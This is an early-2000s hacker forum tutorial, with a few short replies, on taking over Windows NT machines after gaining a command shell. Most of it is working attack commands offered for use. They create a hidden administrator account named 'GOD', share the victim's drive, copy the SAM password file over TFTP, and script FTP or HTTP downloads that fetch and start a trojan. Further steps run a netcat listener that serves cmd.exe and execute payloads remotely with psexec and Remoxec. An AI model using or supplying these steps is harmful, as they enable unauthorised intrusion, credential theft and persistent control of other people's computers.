So you got a command shell prompt with your '0day s00p3r h4x0rin .c skrypt' and you dont know what the (filtered) a command prompt is cuz you don't know shit about DOS and cant do anything without a pretty point-n-click GUI interface. and need to get your UPX/hex-edited/undetected s00per trojan loaded onto it and be a real hax0r.
+++ r00tin' NT - 0x01. The Basics + What are net commands? + What are some net commands? + What is NetBIOS? + Creating a local admin account. + How to transfer files to and from. + How do I execute those files remotely?
0x01. The Basics - What are net commands? ````````````````````````````````````````` What are net command exactly? Net commands are commands used in order to show information regarding a server or network which can include information on the servers, networks, shares, and connections. Other commands include commands in which you can edit user accounts, groups, and other configuration types.
0x01. The Basics - What are some net commands? `````````````````````````````````````````````` What are some net commands? There are various net commands in which you can use to view server info. Some of these net commands would include the ever popular NET use, NET share and NET view. But these arent the only net commands available. There is a wide variety of net command and they are as followed:
- NET Accounts - NET Print - NET Computer - NET Send - NET Config Server - NET Session - NET Config Workstation - NET Share - NET Continue - NET Statistics Server - NET File - NET Statistics Workstation - NET Group - NET Stop - NET Help - NET Time - NET Helpmsg - NET Use - NET Localgroup - NET User - NET Name - NET Ver - NET Pause - NET View
Net commands are great ways to spy on hacked windows NT servers because your checking on the network's status. The most widely used net commands in NT hacking are NET View, NET Share, and NET Use because they each do a certain thing which can be used for attacking. NET View, which is used to display a list of resources being shared on the attacked computer, NET Share which will display a list of information about all the resources that are being shared on the attacked computer which can also be used to create network shares, and last but not least NET Use which will display a list of connected computers which also has options for connecting and disconnecting from previously made shares. With those 3 commands, you have the ability to be able to do an attack called NetBIOS hacking.
0x01. The Basics - Creating a local admin account. `````````````````````````````````````````````````` First off i always start off with making myself an admin on the computer just in case the shell is lost. Add your name to admin group: net user [username] [password] /add net localgroup administrators [username] /add ( C:\WINNT\System32>net user GOD 0wned /add ) ( C:\WINNT\System32>net localgroup administrators GOD /add )
0x01. The Basics - How to transfer files to and from. ````````````````````````````````````````````````````` Now's a good time to transfer some files :) here are some good methods of transferring files that i use:
1. Open the c: drive up for file sharing/transferring C:\>NET SHARE shareME=C: which u can connect to in your browser window \\victimsIP\shareME or type in YOUR dos prompt c:>NET USE x: \\VICTIMip\shareME /user:GOD
2. TFTP transfers (u need to have a TFTP server running on your computer) http://www.solarwinds.net/Tools/Free_tools/TFTP_Server/ TFTP [-i] YOURIP [GET | PUT] source [destination] C:\WINNT\SYSTEM32>TFTP -i 127.0.0.1 GET SAM c:\rootedSAMS
3. from a command prompt echo ftp commands into a .bat file and execute it echo user <USERNAME> >>c:\$.tmp echo <PASSWORD> >>c:\$.tmp echo lcd c:\windows >>c:\$.tmp echo binary >>c:\$.tmp echo get <FILENAME.EXE> >>c:\$.tmp echo quit >>c:\$.tmp ftp -v -i -n -s:c:\$.tmp <FTP SITE> c:\$$.tmp <FILENAME.EXE> del c:\$.tmp del c:\$$.tmp
4. i have created a commandline webdownloader which allows you to grab a file from a website and execute it its more reliable when transferring files (ftp server have timeouts , TFTP uses UDP packets so it fails alot) http://illmob.org/stuff/cmdget.zip u need to get it on the server.exe using the above choices then you can use it normally cmdget http://blah.com/trojan.exe c:\0wned.exe well how would i get your exe onto the hacked server illwill u dumbass you might ask well you could use this program brainbuster made...basically its a gui front-end to create a debug script that you can paste into a shell line by line that will create a bat file that will re-compile the script into .exe http://illmob.org/stuff/exe2txt.zip
***Added from 101 on GSO forums 5/31/04 A small tip now if you wanna use secureCRT in listening mode to be able then to copy paste the huge .txt without problems: -*example*- your localip = 192.168.0.2 run a listening netcat1 : nc.exe -vv -L -p 12345 -t -e cmd.exe -s 192.168.0.2 With SecureCRT , do a simple telnet connection on 192.168.0.2:12345 (youll have a shell of course on your own computer trough securecrt) Open now another listening netcat2 through this local sCRT shell, you'll be able finally to copy paste this huge txt if a victim spawn a shell to this netcat2 *****
*i would also recommend dropping a copy of netcat onto the server because you can do a shitload of stuff with it like file transfers .. you would start nc listening on a port and then on your computer c:\>nc (vic_ip) (vic_port) < file.exe
***Added from 7/06/04 Method #1 http download with one paste -------------------- SNIP----------------------
Method #2 ftp downloading with one paste change the ftp.blah.com to the own ftp+dir and add your username/pass
-------------------- SNIP----------------------
echo user USERNAME >>c:\$.tmp && echo PASS >>c:\$.tmp && echo binary >>c:\$.tmp && echo get test.exe >>c:\$.tmp && echo quit >>c:\$.tmp && ftp -v -i -n -s:c:\$.tmp ftp.blah.com c:\$$.tmp && start c:\test.exe && del c:\$.tmp && del c:\$$.tmp
------------------END SNIP----------------------
0x01. The Basics - How do I execute those files remotely? ````````````````````````````````````````````````````````` Having trouble trying to execute files remotely? Try PSEXEC http://www.sysinternals.com/ntw2k/freeware/psexec.shtml/ psexec -u [username] -p [password] [command] if I created a user "GOD" with the password "0wn3d" C:\>psexec -u GOD -p 0wn3d blah.exe or if you wanna have their TFTP connect back to u and retrieve a file c:\>psexec -u GOD -p 0wn3d "tftp -i 127.0.0.1 get trojan.exe"
NOTE: Psexec will only work if you add an administrator user first, and if the computer doesnt have remote administrating disabled, or one of the ports firewalled out. or try RemoExec http://securityfriday.com/ToolDownload/Remoxec/remoxec_doc.html Remoxec executes a program using DCOM. Just supply an IP,USER,PASS,and the EXE you wanna execute.
this a working textfile that i have been kicking around ill keep adding to it sooner or later when i get some more time -peace illwill
Paul
Jul 11 2004, 11:56 AM
Gonna give ppl this tut if they asking me nice1 illwill
chris105
Jul 11 2004, 12:10 PM
Yeah its a good framework which im sure if you find time you will be able to build upon.
Just one bone to pick, WHY r00t WHY! WHY! WHY! please use root cos r00t makes you look like a prick
Other than that well done
linuxwolf
Jul 11 2004, 09:52 PM
haha, well said. nice one ill. now we wait for the grammatically challenged replies.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
